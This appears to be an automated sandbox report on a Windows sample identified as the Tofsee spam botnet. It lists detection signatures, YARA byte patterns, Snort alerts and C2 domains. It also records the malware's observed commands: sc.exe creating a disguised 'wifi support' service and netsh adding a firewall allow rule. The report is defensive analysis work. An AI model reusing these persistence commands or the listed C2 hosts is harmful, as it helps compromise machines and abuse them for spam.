
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 800802
MD5: 546a040e4479958f7c6b862dead9a269
SHA1: 69a99c8f2fbfc316140690be348d6b54d6c01d7d
SHA256: 229d8701db31564e7eccab699121e96fe75d70896daa87323e9c59da3be74be0
Tags: exe

Detection

Tofsee
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Tofsee
Uses netsh to modify the Windows network and firewall settings
Query firmware table information (likely to detect VMs)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign process
Deletes itself after installation
Drops executables to the windows directory (C:\Windows) and starts them
Writes to foreign memory regions
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Found decision node followed by non-executed suspicious APIs
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Modifies existing windows services
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Creates files inside the system directory
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Uses SMTP (mail sending)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Queries disk information (often used to detect virtual machines)
Contains functionality to query network adapter information

Classification

  • System is w10x64
  • file.exe (PID: 5128 cmdline: C:\Users\user\Desktop\file.exe MD5: 546A040E4479958F7C6B862DEAD9A269)
    • cmd.exe (PID: 3076 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\htdzdeug\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 2432 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\qbxctmyn.exe" C:\Windows\SysWOW64\htdzdeug\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 1020 cmdline: C:\Windows\System32\sc.exe" create htdzdeug binPath= "C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d\"C:\Users\user\Desktop\file.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 5828 cmdline: C:\Windows\System32\sc.exe" description htdzdeug "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 3108 cmdline: "C:\Windows\System32\sc.exe" start htdzdeug MD5: 24A3E2603E63BCB9695A2935D3B24695)
      • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • netsh.exe (PID: 5864 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
      • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6120 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3592 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5064 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5400 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1764 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1652 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • qbxctmyn.exe (PID: 4532 cmdline: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe /d"C:\Users\user\Desktop\file.exe" MD5: D83D3102AEE8419201BF810DE2A41992)
    • svchost.exe (PID: 2888 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • svchost.exe (PID: 1328 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2140 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 612 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 1500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4204 cmdline: c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
Malware Configuration Extractor: Tofsee {"C2 list": ["svartalfheim.top:443", "jotunheim.name:443"]}
Source | Rule | Description | Author | Strings
00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0x1123e:$s1: n%systemroot%\system32\cmd.exe
  • 0x10310:$s2: loader_id
  • 0x10340:$s3: start_srv
  • 0x10370:$s4: lid_file_upd
  • 0x10364:$s5: localcfg
  • 0x10a94:$s6: Incorrect respons
  • 0x10b74:$s7: mx connect error
  • 0x10af0:$s8: Error sending command (sent = %d/%d)
  • 0x10c28:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown
  • 0x2544:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xee95:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
(24 entries in total; the remaining entries are not reproduced here)

Source | Rule | Description | Author | Strings
0.2.file.exe.2080e67.1.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
0.2.file.exe.2080e67.1.raw.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0xfc3e:$s1: n%systemroot%\system32\cmd.exe
  • 0xed10:$s2: loader_id
  • 0xed40:$s3: start_srv
  • 0xed70:$s4: lid_file_upd
  • 0xed64:$s5: localcfg
  • 0xf494:$s6: Incorrect respons
  • 0xf574:$s7: mx connect error
  • 0xf4f0:$s8: Error sending command (sent = %d/%d)
  • 0xf628:$s9: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u
0.2.file.exe.2080e67.1.raw.unpack | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown
  • 0x1944:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xe295:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
17.2.qbxctmyn.exe.e30e67.1.unpack | MALWARE_Win_Tofsee | Detects Tofsee | ditekSHen
  • 0xe110:$s2: loader_id
  • 0xe140:$s3: start_srv
  • 0xe170:$s4: lid_file_upd
  • 0xe164:$s5: localcfg
  • 0xe894:$s6: Incorrect respons
17.2.qbxctmyn.exe.e30e67.1.unpack | Windows_Trojan_Tofsee_26124fe4 | unknown | unknown
  • 0xd44:$a: 55 8B EC 8B 45 08 57 8B 7D 10 B1 01 85 FF 74 1D 56 8B 75 0C 2B F0 8A 14 06 32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14 40 4F 75 EA 5E 8B 45 08 5F 5D C3
  • 0xd695:$b: 8B 44 24 04 53 8A 18 84 DB 74 2D 8B D0 2B 54 24 0C 8B 4C 24 0C 84 DB 74 12 8A 19 84 DB 74 1B 38 1C 0A 75 07 41 80 3C 0A 00 75 EE 80 39 00 74 0A 40 8A 18 42 84 DB 75 D9 33 C0 5B C3
(39 entries in total; the remaining entries are not reproduced here)
        No Sigma rule has matched
Timestamp: 02/07/23-20:05:14.210188
Source IP: 192.168.2.3
Destination IP: 8.8.8.8
Source Port: 56924
Destination Port: 53
SID: 2023883
Protocol: UDP
Classtype: Potentially Bad Traffic

Timestamp: 02/07/23-20:04:33.939091
Source IP: 192.168.2.3
Destination IP: 8.8.8.8
Source Port: 52387
Destination Port: 53
SID: 2023883
Protocol: UDP
Classtype: Potentially Bad Traffic

Timestamp: 02/07/23-20:05:54.726769
Source IP: 192.168.2.3
Destination IP: 8.8.8.8
Source Port: 60625
Destination Port: 53
SID: 2023883
Protocol: UDP
Classtype: Potentially Bad Traffic


        AV Detection

Source: C:\Users\user\AppData\Local\Temp\qbxctmyn.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: file.exe | ReversingLabs: Detection: 43%
Source: file.exe | Virustotal: Detection: 34%
Source: svartalfheim.top | Virustotal: Detection: 17%
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qbxctmyn.exe | Joe Sandbox ML: detected
Source: 17.2.qbxctmyn.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 23.2.svchost.exe.120000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 17.2.qbxctmyn.exe.e90000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.2.file.exe.2080e67.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.file.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 0.3.file.exe.21c0000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.qbxctmyn.exe.e30e67.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 17.3.qbxctmyn.exe.e50000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.qbxctmyn.exe.400000.0.unpack | Malware Configuration Extractor: Tofsee {"C2 list": ["svartalfheim.top:443", "jotunheim.name:443"]}

        Compliance

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe | Unpacked PE file: 17.2.qbxctmyn.exe.400000.0.unpack
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr
Source: Binary string: WaaSMedicSvc.pdb source: waasmedic.20230208_040427_786.etl.22.dr
Source: Binary string: *C:\xidiw\reduhorulutufa\nidegiv_naxose.pdb source: file.exe, qbxctmyn.exe.0.dr

        Networking

Source: C:\Windows\SysWOW64\svchost.exe | Domain query: svartalfheim.top
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 176.124.192.220 443
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 104.47.54.36 25
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:52387 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:56924 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:60625 -> 8.8.8.8:53
Source: Malware configuration extractor | URLs: svartalfheim.top:443
Source: Malware configuration extractor | URLs: jotunheim.name:443
Source: Joe Sandbox View | ASN Name: GULFSTREAMUA GULFSTREAMUA
Source: Joe Sandbox View | IP Address: 176.124.192.220 176.124.192.220
Source: global traffic | TCP traffic: 192.168.2.3:49703 -> 104.47.54.36:25
Source: svchost.exe, 0000000B.00000002.309310506.00000189DAC13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000002.531375972.0000028763243000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.309061387.00000189DAC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309440269.00000189DAC56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309380373.00000189DAC42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309380373.00000189DAC42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
Source: svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000002.309387517.00000189DAC4B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309001871.00000189DAC49000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309042425.00000189DAC41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000B.00000003.308983350.00000189DAC60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000B.00000002.309310506.00000189DAC13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309374208.00000189DAC3D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000B.00000003.309037099.00000189DAC45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.309018203.00000189DAC40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000B.00000002.309364718.00000189DAC39000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.286983822.00000189DAC30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000B.00000003.309061387.00000189DAC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.309440269.00000189DAC56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.308990855.00000189DAC4E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: unknown | DNS traffic detected: queries for: microsoft-com.mail.protection.outlook.com
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A62 GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,socket,htons,select,recv,htons,htons,htons,GetProcessHeap,HeapAlloc,htons,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree | 0_2_00402A62
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: file.exe, 00000000.00000002.289843511.00000000007A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

        Spam, unwanted Advertisements and Ransom Demands

Source: Yara match | File source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.21c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.qbxctmyn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.qbxctmyn.exe.e90000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.qbxctmyn.exe.e30e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.2.svchost.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.310889841.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.530839656.0000000000120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000003.309369013.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.279056535.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5128, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: qbxctmyn.exe PID: 4532, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 2888, type: MEMORYSTR

        System Summary

Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 0.2.file.exe.2080e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.2.qbxctmyn.exe.e30e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.2.qbxctmyn.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 23.2.svchost.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.3.qbxctmyn.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.2.qbxctmyn.exe.e90000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Tofsee, Author: ditekSHen
Source: 17.3.qbxctmyn.exe.e50000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Tofsee_26124fe4, Author: unknown
